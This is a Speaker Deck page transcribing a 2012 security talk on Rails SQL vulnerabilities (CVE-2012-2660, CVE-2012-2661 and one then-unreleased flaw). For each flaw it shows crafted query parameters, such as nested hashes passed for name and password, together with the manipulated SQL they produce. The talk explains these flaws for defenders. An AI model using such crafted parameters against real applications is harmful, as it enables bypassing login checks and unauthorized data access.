Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
"Recent Rails SQL Issues" - 2012
Search
Justin Collins
April 23, 2015
Programming
0
62
"Recent Rails SQL Issues" - 2012
Justin Collins
April 23, 2015
Tweet
Share
More Decks by Justin Collins
See All by Justin Collins
Continuous (Application) Security at DevOps Velocity
presidentbeef
0
130
The Evolution of Rails Security
presidentbeef
1
740
Brakeman RailsConf 2017 Lightning Talk
presidentbeef
0
110
Practical Static Analysis for Continuous Application Security
presidentbeef
0
170
"...But Doesn't Rails Take Care of Security for Me?"
presidentbeef
1
380
Continuous Security with Practical Static Analysis
presidentbeef
1
270
Security Automation at Twitter - Rise of the Machines
presidentbeef
0
200
The World of Rails Security - RailsConf 2015
presidentbeef
8
1.1k
Tales from the Crypt
presidentbeef
1
190
Other Decks in Programming
See All in Programming
Monixと常駐プログラムの勘どころ / Scalaわいわい勉強会 #4
stoneream
0
280
生成AIでGitHubソースコード取得して仕様書を作成
shukob
0
500
暇に任せてProxmoxコンソール 作ってみました
karugamo
2
720
Cloudflare MCP ServerでClaude Desktop からWeb APIを構築
kutakutat
1
560
Jakarta EE meets AI
ivargrimstad
0
260
テストコード文化を0から作り、変化し続けた組織
kazatohiei
2
1.5k
責務を分離するための例外設計 - PHPカンファレンス 2024
kajitack
8
1.8k
Итераторы в Go 1.23: зачем они нужны, как использовать, и насколько они быстрые?
lamodatech
0
890
短期間での新規プロダクト開発における「コスパの良い」Goのテスト戦略」 / kamakura.go
n3xem
2
170
週次リリースを実現するための グローバルアプリ開発
tera_ny
1
110
情報漏洩させないための設計
kubotak
3
500
MCP with Cloudflare Workers
yusukebe
2
220
Featured
See All Featured
How to Create Impact in a Changing Tech Landscape [PerfNow 2023]
tammyeverts
48
2.2k
Typedesign – Prime Four
hannesfritz
40
2.4k
Responsive Adventures: Dirty Tricks From The Dark Corners of Front-End
smashingmag
251
21k
No one is an island. Learnings from fostering a developers community.
thoeni
19
3k
RailsConf & Balkan Ruby 2019: The Past, Present, and Future of Rails at GitHub
eileencodes
132
33k
Building Flexible Design Systems
yeseniaperezcruz
327
38k
The Myth of the Modular Monolith - Day 2 Keynote - Rails World 2024
eileencodes
17
2.3k
Distributed Sagas: A Protocol for Coordinating Microservices
caitiem20
330
21k
How GitHub (no longer) Works
holman
311
140k
4 Signs Your Business is Dying
shpigford
182
21k
Adopting Sorbet at Scale
ufuk
73
9.1k
CSS Pre-Processors: Stylus, Less & Sass
bermonpainter
356
29k
Transcript
Rails Vulnerabilities Last Week CVE-2012-2660 CVE-2012-2661
CVE-2012-2660 Allows unexpected “IS NULL” in queries Affects Rails 2.x
and 3.x
ActiveRecord Query unless params[:name].nil? @user = User.where(:name => params[:name]) end
Query Parameters ?name[] {"name"=>[nil]}
ActiveRecord Query unless [nil].nil? @user = User.where(:name => [nil]) end
Resulting SQL SELECT "users".* FROM "users" WHERE "users"."name" IS NULL
CVE-2012-2661 Allows some manipulation of WHERE clause via “dotted” query
keys Affects Rails 3.x
ActiveRecord Query User.where(:name => params[:name])
ActiveRecord Query User.where("users.name" => params[:name])
Query Parameters ?name[users.id]=1 {"name"=>{"users.id"=>"1"}}
ActiveRecord Query User.where(:name => {"users.id" => "1"})
Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =
1
Unreleased Vulnerability Allows some manipulation of WHERE clause via nested
hashes in query values Affects 2.3.x and 3.x
ActiveRecord Query User.where(:name => params[:name], :password => params[:password])
Query Parameters ?name[users][id]=1&password[users][id]=1 {"name"=>{"users"=>{"id"=>"1"}}, "password" =>{"users"=>{"id"=>"1"}}}
ActiveRecord Query User.where( :name => {"users"=>{"id"=>"1"}, :password => {"users"=>{"id"=>"1"} )
Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =
1 AND "users"."id" = 1